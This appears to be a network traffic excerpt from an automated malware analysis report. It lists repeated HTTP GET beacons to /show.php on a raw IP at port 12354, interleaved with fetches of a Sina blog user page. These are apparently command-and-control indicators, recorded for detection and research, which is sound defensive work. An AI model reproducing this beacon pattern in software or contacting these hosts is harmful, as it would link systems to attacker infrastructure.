Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
